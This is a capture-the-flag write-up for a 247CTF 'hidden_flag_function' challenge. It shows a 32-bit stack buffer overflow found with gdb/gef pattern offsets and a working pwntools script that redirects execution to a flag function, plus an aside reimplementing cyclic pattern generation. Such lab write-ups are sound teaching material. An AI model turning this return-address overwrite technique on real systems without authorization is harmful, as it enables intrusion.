![ddcb5a5a1cceac2f48661f5a7bbc1985.png](621452062d74478d83b37c8a53a63256.png)

Let's run it and see what we get.

![b9727400a632351051e9842eece27e50.png](46b8f6ff51f84fccb089f2c56ad3610a.png)

It just takes some input. Let's use **gdb** (with **gef**) to analyze the binary.

First, find the function with `info functions`:

![c64b2a158a4b06d416f55536a7f5df04.png](ce40a315a501456b8cbe5ba23667f095.png)

So the function we want is at `0x08048576`.

Next, find the offset:

1. Create a pattern: `pattern create 100`
2. Send that to the program by first running it with **r**

Nice! We get a **segfault**.

![24b8793fb9f7cd3ea645f0d1c84cd599.png](c6722ae3e7d541058fbf29bd69068451.png)

**gdb** is telling us that the segfault is at `0x61616174`. Let's use that as our pattern search parameter to find the offset: `pattern search 0x61616174`

![5136d287918a16a14b649dc59e7d80d3.png](eec12c0426fe4328870d4041da859783.png)

There's our offset: **76**.

We can test this by using **pi** in **gef** and sending the output into the program: `pi print('A'*76 + 'B'*4)`

![9b9424712ed54c405caf261ebf9f933d.png](7d04c82e06d9464381202e72ebb1e1fb.png)

If all goes well, it should fill the buffer with **41** and overwrite the instruction pointer with `0x424242` *(A = 41, B = 42)*.

![911c20500bb29f3bdcdbf635c9de9477.png](8a131153f51f4597928701aeb0941815.png)

Cool, so we control the instruction pointer now. Now that we know the **offset** and the **function address**, we can write an exploit.
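As an added aside on the offset step (illustrative code of mine, not part of the original writeup): the cyclic pattern gef builds is a de Bruijn sequence, so every 4-byte window occurs exactly once, and the faulting address, read as little-endian bytes, pins down where in the input those bytes sat. The two functions below reproduce `pattern create` and `pattern search` in plain Python; that gef uses the FKM construction over a lowercase alphabet with period 4 is an assumption, though it agrees with the **76** found above.

```python
import itertools
import string

ALPHABET = string.ascii_lowercase
PERIOD = 4  # 32-bit target: every 4-byte window of the pattern is unique


def de_bruijn(alphabet=ALPHABET, n=PERIOD):
    """Lazily yield the de Bruijn sequence B(k, n) over `alphabet` using the
    FKM algorithm (assumed to be the same construction gef/pwntools use)."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in a[1:p + 1]:
                    yield alphabet[i]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def pattern_create(length):
    """Equivalent of gef's `pattern create <length>`."""
    return ''.join(itertools.islice(de_bruijn(), length))


def pattern_search(crash_addr, n=PERIOD, max_len=100_000):
    """Equivalent of gef's `pattern search 0x...`: the faulting address holds
    four pattern bytes that the CPU read little-endian, so undo that and look
    the window up in the pattern. Returns -1 if the value is not from it."""
    needle = crash_addr.to_bytes(n, 'little').decode('ascii', errors='replace')
    return pattern_create(max_len).find(needle)


if __name__ == '__main__':
    offset = pattern_search(0x61616174)   # the value gdb reported above
    print(pattern_create(24), offset)     # aaaabaaacaaadaaaeaaafaaa 76
```

A hit of -1 means the crash value did not come from the pattern at all, which is the first thing to check before trusting an offset.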
Here's my code:

```python
# importing the pwntools library
from pwn import *

# creating the process
io = process('./hidden_flag_function')

# creating the connection to the server
#io = remote('1e9f746024b2e701.247ctf.com', 50254)

# setting the padding and function location variables
padding = b'A' * 76
funcloc = 0x08048576

# attaching the process to GDB for debugging
gdb.attach(io)

# receiving one line
io.recvline()

# sending the payload: 76 bytes of padding, then the function address packed as a 32-bit little-endian value
io.sendline(padding + p32(funcloc))

# receiving 3 lines
print(io.recvline())
print(io.recvline())
print(io.recvline())
```

![5c1fdce0faeed3a1f324fb95b869c0a0.png](ed473bb5148743bd858fbed68d9cf671.png)

Looks good! It looks like we called the `flag()` function, which then called `fgets()` and it broke. Let's fire it at the service by uncommenting the `io = remote()` line and commenting out the `gdb.attach(io)` and `io = process()` lines.

![21f5ff54dd607ff2a97cb9b8aebbe7a5.png](fb41f06c46e24561b84c17bb0b31b7f0.png)

---

Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]

Tags: #ctf #buffer_overflow #exploit_development #pwn #scripting #gdb #gef

Related: